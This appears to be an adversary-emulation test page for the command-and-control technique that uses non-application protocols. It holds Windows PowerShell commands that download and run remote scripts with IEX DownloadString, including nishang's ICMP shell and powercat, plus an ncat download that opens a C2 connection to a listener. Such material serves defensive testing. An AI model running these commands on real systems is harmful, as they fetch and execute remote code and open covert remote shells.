Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
server_ip | The IP address of the listening server | string | 127.0.0.1 |
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress #{server_ip}
Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
server_port | The port for the C2 connection | integer | 80 |
ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe |
ncat_path | The folder path of ncat.exe | path | $env:TEMP\T1095 |
server_ip | The IP address or domain name of the listening server | string | 127.0.0.1 |
cmd /c #{ncat_exe} #{server_ip} #{server_port}
if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip"
Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force
$unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) {
Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}
Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
server_ip | The IP address or domain name of the listening server | string | 127.0.0.1 |
server_port | The port for the C2 connection | integer | 80 |
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c #{server_ip} -p #{server_port}